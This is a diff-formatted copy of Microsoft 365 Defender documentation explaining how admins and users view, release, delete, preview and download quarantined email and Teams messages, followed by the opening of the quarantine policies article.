-> To see details about other quarantined Teams messages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next section in the details flyout is related to quarantined Teams messages:
--- **Quarantine details** section:
- - **Expires**
- - **Time received**
- - **Quarantine reason**
- - **Release status**
- - **Policy type**: The value is **None**.
- - **Policy name**: The value is **Teams Protection Policy**.
- - **Quarantine policy**
-
-The rest of the details flyout contains the **Message details**, **Sender**, **Participants**, **Channel details**, and **URLs** sections that are part of the _Teams message entity panel_. For more information, see [The Teams mMessage entity panel in Microsoft Defender for Office 365 Plan 2](teams-message-entity-panel.md).
-
-When you're finished in the details flyout, select **Close**.
--
-### Take action on quarantined Teams messages
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Teams messages** tab. Or, to go directly to the **Teams messages** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Teams>.
-
-On the **Teams messages** tab, select the quarantined message by using either of the following methods:
--- Select the message from the list by selecting the check box next to the first column. The available actions are no longer grayed out.-
- :::image type="content" source="../../media/quarantine-teams-message-selected-message-actions.png" alt-text="Screenshot of the available actions after you select the check box of a quarantined Teams message on the Teams message tab of the Quarantine page." lightbox="../../media/quarantine-teams-message-selected-message-actions.png":::
--- Select the message from the list by clicking anywhere in the row other than the check box. The available actions are in the details flyout that opens.-
- :::image type="content" source="../../media/quarantine-teams-details-flyout-actions.png" alt-text="Screenshot of the available actions in the details flyout that opens after you select a quarantined Teams message from the Teams messages tab of the Quarantine page." lightbox="../../media/quarantine-teams-details-flyout-actions.png":::
-
-Using either method to select the message, some actions are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**.
-
-After you select the quarantined message, the available actions are described in the following subsections.
-
-#### Release quarantined Teams messages
-
-This action isn't available for Teams messages that have already been released (the **Release status** value is **Released**).
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to release it:
--- **On the Teams messages tab**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release**.-
-In the **Release to all chat participants** flyout that opens, decide whether to select **Submit the message to Microsoft to improve detection (false positive)**, and then select **Release**.
-
-#### Delete Teams messages from quarantine
-
-If you don't release or remove a Teams message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the Teams message, use either of the following methods to remove it:
--- **On the Teams messages tab**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete messages**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete from quarantine**.-
-In the warning dialog that opens, read the information and then select **Continue**.
-
-Back on the **Teams messages** tab, the message is no longer listed.
-
-#### Preview Teams messages from quarantine
-
-After you select the Teams message, use either of the following methods to preview it:
--- **On the Teams messages tab**: Select :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-
-In the flyout that opens, choose one of the following tabs:
--- **Source**: Shows the HTML version of the message body with all links disabled.-- **Plain text**: Shows the message body in plain text.-
-#### Report Teams messages to Microsoft for review from quarantine
-
-After you select the message, use either of the following methods to report the message to Microsoft for analysis:
--- **On the Teams messages tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit for review**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit for review**.-
-When you select **Submit message**, the message is sent to Microsoft for analysis. You receive an **Item** submitted dialog where you select **OK**.
-
-#### Download Teams messages from quarantine
-
-After you select the Teams message, use either of the following methods to download it:
--- **On the Teams messages tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download messages**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download message**.-
-In the **Download messages** flyout that opens, enter the following information:
--- **Reason for downloading file**: Enter descriptive text.-- **Create password** and **Confirm password**: Enter a password that's required to open the downloaded message file.-
-When you're finished on the **Download file** flyout, select **Download**.
-
-By default, The .html message file is saved in a compressed file named Quarantined Messages.zip in your **Downloads** folder. If the .zip file already exists, a number is appended to the filename (for example, Quarantined Messages(1).zip).
-
-Back on the **Download messages** flyout, select **Done**.
-
-#### Take action on multiple quarantined Teams messages
-
-When you select multiple quarantined messages on the **Teams messages** tab by selecting the check boxes next to the first column, the following bulk actions are available on the **Teams messages** tab:
--- [Release quarantined Teams messages](#release-quarantined-teams-messages)-- [Delete Teams messages from quarantine](#delete-teams-messages-from-quarantine)-- [Report Teams messages to Microsoft for review from quarantine](#report-teams-messages-to-microsoft-for-review-from-quarantine)-- [Download Teams messages from quarantine](#download-teams-messages-from-quarantine)--
-#### Approve or deny release requests from users for quarantined Teams messages
-
-When a user requests the release of a quarantined Teams message, the **Release status** value changes to **Release requested**, and an admin can approve or deny the request.
-
-For more information, see [Approve or deny release requests from users](#approve-or-deny-release-requests-from-users-for-quarantined-email).
-
-## Use Exchange Online PowerShell or standalone EOP PowerShell to manage quarantined messages
-
-The cmdlets that you use to view and manage messages and files in quarantine are described in this section.
--- [Delete-QuarantineMessage](/powershell/module/exchange/delete-quarantinemessage)-- [Export-QuarantineMessage](/powershell/module/exchange/export-quarantinemessage)-- [Get-QuarantineMessage](/powershell/module/exchange/get-quarantinemessage)-- [Preview-QuarantineMessage](/powershell/module/exchange/preview-quarantinemessage): This cmdlet is for messages only, not quarantined files.-- [Release-QuarantineMessage](/powershell/module/exchange/release-quarantinemessage)-
-## For more information
-
-[Quarantined messages FAQ](quarantine-faq.yml)
security Quarantine End User https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-end-user.md
- Title: Find and release quarantined messages as a user
- - NOCSH
----
- - MET150
- - MEW150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Users can learn how to view and manage quarantined messages in Exchange Online Protection (EOP) that should have been delivered to them.
-
-adobe-target: true
Previously updated : 8/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Manage quarantined messages and files as a user
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, quarantine holds potentially dangerous or unwanted messages. For more information, see [Quarantine in EOP](quarantine-about.md).
-
-As an ordinary user (not an admin), the **default** capabilities that are available to you as a recipient of a quarantined message are described in the following table:
-
-|Quarantine reason|View|Release|Delete|
-||::|::|::|
-|**Anti-spam policies**||||
-|&nbsp;&nbsp;&nbsp;Bulk|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;Spam|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;High confidence spam|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;Phishing|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;High confidence phishing||||
-|**Anti-phishing policies**||||
-|&nbsp;&nbsp;&nbsp;Spoof intelligence protection in EOP|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;Impersonated user protection in Defender for Office 365|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;Impersonated domain protection in Defender for Office 365|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;&nbsp;Mailbox intelligence impersonation protection in Defender for Office 365|Γ£ö|Γ£ö|Γ£ö|
-|**Anti-malware policies**||||
-|&nbsp;&nbsp;&nbsp;Email messages with attachments that are quarantined as malware.||||
-|**Safe Attachments in Defender for Office 365**||||
-|&nbsp;&nbsp;&nbsp;Safe Attachments policies that quarantine email messages with malicious attachments as malware.||||
-|&nbsp;&nbsp;&nbsp;Safe Attachments for SharePoint, OneDrive, and Microsoft Teams that quarantines malicious files as malware.||||
-|**Mail flow rules (transport rules)**||||
-|&nbsp;&nbsp;&nbsp;Mail flow rules that quarantine email messages (directly, not by marking them as spam).||||
-
-In [supported protection features](quarantine-policies.md#step-2-assign-a-quarantine-policy-to-supported-features), _quarantine policies_ define what users are allowed to do to quarantined messages based on why the message was quarantined. Default quarantine policies enforce the historical capabilities for messages as described in the previous table. Admins can create and apply custom quarantine policies that define less restrictive or more restrictive capabilities for users. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-You view and manage your quarantined messages in the Microsoft Defender portal or (if an admin has set this up) quarantine notifications from quarantine policies.
-
-## What do you need to know before you begin?
--- To open the Microsoft Defender portal, go to <https://security.microsoft.com>. To go directly to the **Quarantine** page, use <https://security.microsoft.com/quarantine>.--- Admins can configure how long messages are kept in quarantine before they're permanently deleted in anti-spam policies. Messages that have expired from quarantine are unrecoverable. For more information, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).--- By default, messages that were quarantined for high confidence phishing, malware, or by mail flow rules are only available to admins, and aren't visible to users. For more information, see [Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md).--- All actions taken by admins or users on quarantined messages are audited. For more information about audited quarantine events, see [Quarantine schema in the Office 365 Management API](/office/office-365-management-api/office-365-management-activity-api-schema#quarantine-schema).-
-## Manage quarantined messages in EOP
-
-### View your quarantined messages
-
-> [!NOTE]
-> Your ability to view quarantined messages is controlled by the quarantine policy that applies to the reason why the message was quarantined (which might be the default quarantine policy as described in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md)).
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-On the **Email** tab, you can decrease the vertical spacing in the list by clicking :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal** and then selecting :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Time received**<sup>\*</sup>-- **Subject**<sup>\*</sup>-- **Sender**<sup>\*</sup>-- **Quarantine reason**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Release status**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Policy type**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Expires**<sup>\*</sup>-- **Recipient**<sup>\*</sup>-- **Message ID**-- **Policy name**-- **Message size**-- **Mail direction**-- **Recipient tag**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Message ID**: The globally unique identifier of the message.-- **Sender address**-- **Recipient address**-- **Subject**-- **Time received**:
- - **Last 24 hours**
- - **Last 7 days**
- - **Last 14 days**
- - **Last 30 days** (default)
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Expires**: Filter messages by when they expire from quarantine:
- - **Today**
- - **Next 2 days**
- - **Next 7 days**
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Recipient tag**-- **Quarantine reason**:
- - **Transport rule** (mail flow rule)
- - **Bulk**
- - **Spam**
- - **Data loss prevention**
- - **Malware**: Anti-malware policies in EOP or Safe Attachments policies in Defender for Office 365. The **Policy Type** value indicates which feature was used.
- - **Phishing**: The spam filter verdict was **Phishing** or anti-phishing protection quarantined the message ([spoof settings](anti-phishing-policies-about.md#spoof-settings) or [impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)).
- - **High confidence phishing**
- - **Admin action - File type block**: Messages blocked as malware by the common attachments filter in anti-malware policies. For more information, see [Anti-malware policies](anti-malware-protection-about.md#anti-malware-policies).
-- **Recipient**: **All users** or **Only me**. End users can only manage quarantined messages sent to them.-- **Release status**: Any of the following values:
- - **Needs review**
- - **Approved**
- - **Denied**
- - **Release requested**
- - **Released**
-- **Policy Type**: Filter messages by policy type:
- - **Anti-malware policy**
- - **Safe Attachments policy**
- - **Anti-phishing policy**
- - **Anti-spam policy**
- - **Transport rule** (mail flow rule)
-
- The **Policy type** and **Quarantine reason** values are interrelated. For example, **Bulk** is always associated with an **Anti-spam policy**, never with an **Anti-malware policy**.
-
-When you're finished on the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-> [!TIP]
-> Filters are cached. The filters from the last sessions are selected by default the next time you open the **Quarantine** page. This behavior helps with triage operations.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific messages. Wildcards aren't supported. You can search by the following values:
--- Sender email address-- Subject. Use the entire subject of the message. The search isn't case-sensitive.-
-After you've entered the search criteria, press the enter ENTER key to filter the results.
-
-> [!NOTE]
-> The **Search** box searches for quarantined items in the current view, not all quarantined items. To search all quarantined items, use **Filter** and the resulting **Filters** flyout.
-
-After you find a specific quarantined message, select the message to view details about it and to take action on it (for example, view, release, download, or delete the message).
-
-> [!TIP]
-> On mobile devices, the previously described controls are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**.
->
-> :::image type="content" source="../../media/quarantine-user-message-main-page-mobile-actions.png" alt-text="Selecting a quarantined message and then selecting More on a mobile device." lightbox="../../media/quarantine-user-message-main-page-mobile-actions.png":::
-
-#### View quarantined message details
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-2. On the **Email** tab, select the quarantined message by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, the following information is available:
--- **Quarantine details** section:
- - **Received**: The date/time when the message was received.
- - **Expires**: The date/time when the message is automatically and permanently deleted from quarantine.
- - **Subject**
- - **Quarantine reason**: Shows if a message has been identified as **Spam**, **Bulk**, **Phish**, matched a mail flow rule (**Transport rule**), or was identified as containing **Malware**.
- - **Policy type**
- - **Policy name**
- - **Recipient count**
- - **Recipients**: If the message contains multiple recipients, you might need to select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: \> **Preview message** or :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: \> **View message header** to see the complete list of recipients.
-- **Email details** section:
- - **Sender address**
- - **Time received**
- - **Network message ID**
- - **Recipients**
--
-To take action on the message, see the next section.
-
-> [!TIP]
-> To see details about other quarantined messages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-### Take action on quarantined email
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-2. On the **Email** tab, select the quarantined email message by using either of the following methods:
-
- - Select the message from the list by selecting the check box next to the first column. The available actions are no longer grayed out.
-
- :::image type="content" source="../../media/quarantine-user-message-selected-message-actions.png" alt-text="Available actions after you select a quarantined message on the Email tab of the Quarantine page." lightbox="../../media/quarantine-user-message-selected-message-actions.png":::
-
- - Select the message from the list by clicking anywhere in the row other than the check box. The available actions are in the details flyout that opens.
-
- :::image type="content" source="../../media/quarantine-user-message-details-flyout-actions.png" alt-text="The available actions in the details flyout of a quarantined message" lightbox="../../media/quarantine-user-message-details-flyout-actions.png":::
-
- Using either method to select the message, some actions are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** or **More options**.
-
-After you select the quarantined message, the available actions are described in the following subsections.
-
-> [!TIP]
-> On mobile devices, the action experience is slightly different:
->
-> - When you select the message by selecting the check box, all actions are under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More**:
->
-> :::image type="content" source="../../media/quarantine-user-message-main-page-mobile-actions.png" alt-text="Selecting a quarantined message and then selecting More on a mobile device." lightbox="../../media/quarantine-user-message-main-page-mobile-actions.png":::
->
-> - When you select the message by clicking anywhere in the row other than the check box, most options are available under :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** in the details flyout:
->
-> :::image type="content" source="../../media/quarantine-user-message-details-flyout-mobile-actions.png" alt-text="The details of a quarantined message with available actions shown." lightbox="../../media/quarantine-user-message-details-flyout-mobile-actions.png":::
-
-#### Release quarantined email
-
-> [!NOTE]
-> Your ability to release quarantined messages is controlled by the quarantine policy for the protection feature that quarantined the message (which might be a default quarantine policy as described in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md)).
->
-> A quarantine policy can allow you to release a message or request the release of a message, but both options aren't available for the same message. A quarantine policy can also prevent you from releasing or requesting the release of quarantined messages.
-
-This action isn't available for email messages that have already been released (the **Release status** value is **Released**).
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to release it (deliver it to your mailbox):
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-check-mark-icon.png" border="false"::: **Release email**.-
-In the **Release message to your Inbox** flyout that opens, select **Report message as having no threats** as appropriate, and then select **Release message**.
-
-When you're finished on the **Release message to your Inbox** flyout, select **Release message**.
-
-In the **Messages released to your Inbox** flyout that opens, select **Done**.
-
-Back on the **Email** tab, the **Release status** value of the message is **Released**.
-
-The message is delivered to your Inbox (or some other folder, depending on any [Inbox rules](https://support.microsoft.com/office/c24f5dea-9465-4df4-ad17-a50704d66c59) in your mailbox).
-
-#### Request the release of quarantined email
-
-> [!NOTE]
-> Your ability to request the release of quarantined messages is controlled by the quarantine policy for the protection feature that quarantined the message.
->
-> A quarantine policy can allow you to release a message or request the release of a message, but both options aren't available for the same message. A quarantine policy can also prevent you from releasing or requesting the release of quarantined messages.
-
-This action isn't available for email messages where you already requested release (the **Release status** value is **Released requested**).
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to request its release:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Request release**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Request release**.-
-In the **Request release** flyout that opens, review the information, select **Request release**. In the **Release requested** flyout that opens, select **Done**.
-
-Back on the **Quarantine page**, the **Release status** value of the message is **Release requested**. An admin will review your request and approve it or deny it.
-
-#### Delete email from quarantine
-
-When you delete an email message from quarantine, the message is removed and isn't sent to the original recipients.
-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
-
-After you select the message, use either of the following methods to remove it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete messages**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete from quarantine**.-
-In the **Delete (n) messages from quarantine** flyout that opens, use one of the following methods to delete the message:
--- Select **Permanently delete the message from quarantine** and then select **Delete**: The message is permanently deleted and isn't recoverable.-- Select **Delete** only: The message is deleted, but is potentially recoverable.-
-After you select **Delete** on the **Delete (n) messages from quarantine** flyout, you return to the **Email** tab where the message is no longer listed.
-
-> [!TIP]
-> Admins can find out who deleted a quarantined message by searching the admin audit log. For instructions, see [Find who deleted a quarantined message](quarantine-admin-manage-messages-files.md#find-who-deleted-a-quarantined-message).
-
-#### Preview email from quarantine
-
-After you select the message, use either of the following methods to preview it:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-preview-message-icon.png" border="false"::: **Preview message**.-
-In the flyout that opens, choose one of the following tabs:
- - **Source**: Shows the HTML version of the message body with all links disabled.
- - **Plain text**: Shows the message body in plain text.
-
-#### View email message headers
-
-After you select the message, use either of the following methods to view the message headers:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message headers**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **View message headers**.-
-In the **Message header** flyout that opens, the message header (all header fields) is shown.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy message header** to copy the message header to the clipboard.
-
-Select the **Microsoft Message Header Analyzer** link to analyze the header fields and values in depth. Paste the message header into the **Insert the message header you would like to analyze** section (CTRL+V or right-click and choose **Paste**), and then select **Analyze headers**.
-
-#### Block email senders from quarantine
-
-The Block senders action adds the message sender to the Blocked Senders list in your mailbox. For more information about blocking senders, see [Block a mail sender](https://support.microsoft.com/office/b29fd867-cac9-40d8-aed1-659e06a706e4).
-
-After you select the message, use either of the following methods to add the message sender to the Blocked Senders list in your mailbox:
--- **On the Email tab**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More** \> :::image type="icon" source="../../media/m365-cc-sc-block-sender-icon.png" border="false"::: **Block sender**.-- **In the details flyout of the selected message**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-sc-block-sender-icon.png" border="false"::: **Block sender**.-
-In the **Block sender** flyout that opens, review the information about the sender, and then select **Block**.
-
-> [!TIP]
-> The organization can still receive mail from the blocked sender. Messages from the sender are delivered to user Junk Email folders or to quarantine. To delete messages from the sender upon arrival, an admin can use [mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) to **Block the message**.
-
-#### Take action on multiple quarantined email messages
-
-When you select multiple quarantined messages on the **Email** tab by selecting the check boxes next to the first column, the following bulk actions are available on the **Email** tab (depending on the **Release status** values of the messages that you selected):
--- [Release quarantined email](#release-quarantined-email)-- [Request the release of quarantined email](#request-the-release-of-quarantined-email)-- [Delete email from quarantine](#delete-email-from-quarantine)-
-## Manage quarantined messages in Microsoft Teams
-
-When a potentially malicious chat message is detected in Microsoft Teams, zero-hour auto purge (ZAP) removes the message and quarantines it. Users can now view and manage these quarantined Teams messages in the Microsoft Defender portal. Quarantine notifications aren't supported for quarantined Teams messages.
-
-### View your quarantined messages in Microsoft Teams
-
-In the Microsoft Defender portal at https://security.microsoft.com, go to **Email & collaboration** > **Review** > **Quarantine** > **Teams messages** tab. Or, to go directly to the **Teams messages** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Teams>.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are:
--- **Teams message text**: Contains the subject for the teams message.-- **Date quarantined**: Showed when the message was quarantined.-- **Status**: Shows whether the message is already reviewed and released or needs review.-- **Sender**: The person who sent the message that was quarantined.-- **Quarantine reason**: Available options are **High confidence phish** and **Malware**.-- **Expires**: Indicates the time after which the message is removed from quarantine. By default, this value is 30 days.-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Sender address**-- **Time received**:
- - **Last 24 hours**
- - **Last 7 days**
- - **Last 14 days**
- - **Last 30 days** (default)
- - **Custom**: Enter a **Start time** and **End time** (date).
-- **Expires in**:
- - **Custom** (default): Enter a **Start time** and **End time** (date).
- - **Today**
- - **Next 2 days**
- - **Next 7 days**
-- **Quarantine reason**: Available values are **Malware** and **High confidence phishing**.-- **Status**: Select **Needs review** and **Released**.-
-When you're finished in the **Filters** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific Teams messages. Wildcards aren't supported.
-
-After you find a specific quarantined Teams message, select the message to view details about it and to take action on it (for example, view, release, download, or delete the message).
-
-#### View quarantined message details in Microsoft Teams
-
-On the **Teams messages** tab, select the quarantined message by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, the following information is available:
--- **Quarantine details** section: Includes quarantine reason, expiry date, quarantine policy type, and other information.
- - **Expires**
- - **Time received**
- - **Quarantine reason**
- - **Release status**
- - **Policy type**
-- **Message details** section: Includes date and time of the message sent, the sender address, Teams message ID, and the list of recipients.
- - **Sender address**
- - **Time received**
- - **Recipients**
- - **Teams message ID**
-
-To take action on the message, see the next section.
-
-### Take action on quarantined messages in Microsoft Teams
-
-On the **Teams messages** tab, select the quarantined message by selecting the check box next to the first column. The following options are available:
--- **Request release**: You can request to release the message from quarantine. Your organization's admin needs to approve the release.-- **Delete**: You can request to delete the message from the list of quarantined messages.-- **Preview message**: You can view the details of the message you selected.-
-If you don't release or remove a message, it's automatically deleted from quarantine after the date shown in the **Expires** column.
security Quarantine Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-policies.md
- Title: Quarantine policies-----
- - MET150
-
- - m365-security
- - tier1
-
-description: Admins can learn how to use quarantine policies to control what users are able to do to quarantined messages.
- Previously updated : 11/16/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Quarantine policies
--
-In Exchange Online Protection (EOP) and Microsoft Defender for Office 365, _quarantine policies_ allow admins to define the user experience for quarantined messages:
--- What users are allowed to do to their own quarantined messages (messages where they're a recipient) based on why the message was quarantined.-- Whether users receive periodic (every four hours, daily, or weekly) notifications about their quarantined messages via [quarantine notifications](quarantine-quarantine-notifications.md).-
-Traditionally, users have been allowed or denied levels of interactivity with quarantine messages based on why the message was quarantined. For example, users can view and release messages that were quarantined as spam or bulk, but they can't view or release messages that were quarantined as high confidence phishing or malware.
-
-Default quarantine policies enforce these historical user capabilities, and are automatically assigned in [supported protection features](#step-2-assign-a-quarantine-policy-to-supported-features) that quarantine messages.
-
-For details about the elements of a quarantine policy, default quarantine policies, and individual permissions, see the [Appendix](#appendix) section at the end of this article.
-
-If you don't like the default user capabilities for quarantined messages for a specific feature (including the lack of quarantine notifications), you can create and use custom quarantine policies as described in this article.
-
-You create and assign quarantine policies in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with Exchange Online mailboxes; standalone EOP PowerShell in EOP organizations without Exchange Online mailboxes).
-
-## What do you need to know before you begin?
